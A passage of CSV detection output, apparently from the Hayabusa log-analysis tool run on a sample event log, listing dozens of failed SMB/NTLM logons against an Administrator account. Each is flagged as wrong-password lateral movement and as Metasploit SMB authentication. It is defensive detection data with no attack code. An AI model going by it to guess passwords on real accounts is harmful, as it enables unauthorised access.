Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F6Jr8XrUsmTiSdol : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Buj66iuSkLEQdKnQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L1wOLI51HqfkgO6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.912 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X4oe273WXOICzkwW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1c7nGezYNJ70jR6R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.992 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ajuZ09zGeuovCQLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4k7xV7soNF4mHlz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CtdqW8zOw1GoQcvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aY6FLi1edRZWrRZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ah1JoKfxJzQhCCVL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.204 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIMOZRGcv4o33BWd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nmLyLJoVZz6fJ62I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aGufqEGD4hFf2XLM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7IEdKy2H5Agblpjt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.340 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XT9k8C05GVLBNPdl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.384 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5opHh8HelCXtR5Cm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0dntDwYLmag9efo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.514 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UQfZOMFV9LtY7r2S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.514 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y01v38dTUIsJEZIv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pCP8x2QBZ6IvMEnf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.739 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hgcbYjw3kKqlK7Di : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.739 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TFU97Tq3e7IWvSKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1hUCvaS1yM2FU9AE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.808 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8JInVlBqTSfT4J1s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EjXRQUGDKBZaMkw3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fZPXNxkGOrld5eCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.937 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OBDhSrF7DZ1KBRa8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.978 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dQ7TKJOGibAVNoCH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.013 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.054 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZE1GARxx03m4FtEL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.054 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gf3VLLTxsK85bsrv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.123 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 58G6MFVbW55JZIV5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.123 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yxne9LqZCqBf3qkc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ssZya6gArnuepKyW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rsDEj6o0NaKUYPZL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.244 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pELSIsupIYAxPCtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: urHCDmdCfNexxUHf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.330 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: czGXZFukLquA9Mce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: icWMY9pKCQMyTxJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v28FLC2WXEXSUiI5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.510 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FwhjHww5iA51SFjp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.510 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 96BwmhKqDIojhdRA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DiRvofjwoeAdHYrv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.601 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.655 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BNLdOrPwbvYELiCc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.655 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x15WKTspmg2ALHaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QMoQWddkcYtCmoKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jhTbfX42Pwn7OA2k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yXcbUCgAhVFfqLc3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.814 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 